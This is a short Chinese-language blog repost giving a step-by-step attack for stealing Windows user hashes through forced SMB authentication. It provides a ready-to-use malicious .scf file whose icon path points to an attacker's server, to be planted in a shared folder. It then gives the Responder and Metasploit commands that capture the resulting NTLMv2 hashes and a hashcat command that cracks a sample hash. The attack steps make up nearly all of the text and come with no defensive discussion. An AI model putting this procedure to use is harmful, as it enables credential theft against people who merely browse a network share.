利用强制smb身份验证获取用户哈希
2021-11-07 10:30:00 Author: mp.weixin.qq.com(查看原文) 阅读量:24 收藏

文章来源:Leticia's Blog

原文链接:

http://uuzdaisuki.com/2021/06/27/%E5%88%A9%E7%94%A8%E5%BC%BA%E5%88%B6smb%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E8%8E%B7%E5%8F%96%E7%94%A8%E6%88%B7%E5%93%88%E5%B8%8C/

前言

攻击者可通过向共享目录投递连接外部服务器的资源文件,用户请求过程中尝试身份验证,会默认使用SMB协议将用户哈希发送到服务器,这样攻击者就会获取对方用户账户哈希。

创建共享目录scf文件

[Shell]
Command=2
IconFile=\\X.X.X.X\share\1.ico
[Taskbar]
Command=ToggleDesktop

重命名后缀为.scf,保存在共享目录

使用responder接收哈希

使用responder开启监听

git clone https://github.com/lgandx/Responder.git
python Responder.py -wrf --lm -v -I eth0

使用任一用户访问刚才建立好的共享目录,只要进入到保存有.scf这一文件的层级就会触发smb身份验证,responder会监听到NTLMv2哈希

use auxiliary/server/capture/smb
run
hashcat -m 5600 Administrator::NEXT:b36ff0a87f24a5b2:59D4E07C55717C42B167E2FF178C0B83:01010000000000005D83AE7CFE67D701B33B25F625134A1E00000000020000000000000000000000 /root/pass.txt --force

侵权请私聊公众号删文



文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650526247&idx=2&sn=aecd5fc439ae8f08e583151c3dd91c8b&chksm=83bab7c3b4cd3ed52d667a61683343acb66f2c1f498c3c518a6e6b0c1d4150c04c9521dd9d00#rd
如有侵权请联系:admin#unsafe.sh